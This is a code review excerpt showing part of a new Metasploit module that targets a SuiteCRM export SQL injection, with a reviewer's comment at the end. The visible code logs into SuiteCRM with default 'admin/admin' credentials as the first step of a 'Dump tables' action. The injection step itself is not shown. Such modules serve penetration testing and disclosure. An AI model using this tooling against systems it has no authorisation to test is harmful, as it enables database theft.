modules/auxiliary/scanner/http/suite_crm_export_sqli.rb

```diff
@@ -0,0 +1,217 @@
+        'Description' => %q{ },
+        'Author' => [
+          'Exodus Intelligence', # Advisory
+          'jheysel-r7', # poc + msf module
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['URL', 'https://blog.exodusintel.com/2022/06/09/salesagility-suitecrm-export-request-sql-injection-vulnerability/']
+        ],
+        # TODO: - update actions
+        #
+        'Actions' => [
+          ['Dump tables', { 'Description' => 'Dumps database tables' }]
+        ],
+        'DefaultAction' => 'Dump tables',
+        'DisclosureDate' => '2022-07-27',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS]
+        },
+        'Privileged' => true
+      )
+    )
+    register_options [
+      OptInt.new('COUNT', [false, 'Number of users to enumerate', 3]),
+      OptString.new('USERNAME', [true, 'Username of user with administrative rights', 'admin']),
+      OptString.new('PASS', [true, 'Password for administrator', 'admin']),
+    ]
+  end
+
+  def authenticate
+    print_status("Authenticating as #{datastore['USERNAME']}")
+    initial_req = send_request_cgi(
+      {
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri, 'index.php'),
+        'keep_cookies' => true,
+        'vars_get' => {
+          'module' => 'Users',
+          'action' => 'Login'
+        }
+      }
+    )
+
+    return false unless initial_req && initial_req.code == 200
+
+    login = send_request_cgi(
+      {
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri, 'index.php'),
+        'keep_cookies' => true,
+        'vars_post' => {
+          'module' => 'Users',
+          'action' => 'Authenticate',
+          'return_module' => 'Users',
+          'return_action' => 'Login',
+          'user_name' => datastore['USERNAME'],
+          'username_password' => datastore['PASS'],
+          'Login' => 'Log In'
+        }
+      }
+    )
+
+    return false unless login && login.code == 302
+
+    res = send_request_cgi(
+      {
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri, 'index.php'),
+        'keep_cookies' => true,
+        'vars_get' => {
+          'module' => 'Administration',
+          'action' => 'index'
+        }
+      }
+    )
+
+    auth_succeeded?(res)
+  end
+
+  def auth_succeeded?(res)
+    return false unless res
+
+    if res.code == 200
+      print_good("Authenticated as: #{datastore['USERNAME']}")
+      if res.body.include?('Unauthorized access to administration.')
+        print_warning("#{datastore['USERNAME']} does not have administrative rights! Exploit will fail.")
+        @is_admin = false
+      else
+        print_good("#{datastore['USERNAME']} has administrative rights.")
+        @is_admin = true
+      end
+      @authenticated = true
+      true
+    else
+      print_error("Failed to authenticate as: #{datastore['USERNAME']}")
+      false
+    end
+  end
```

Comment:
Might be mixin worthy; But we'd want to avoid the instance variable mutation most likely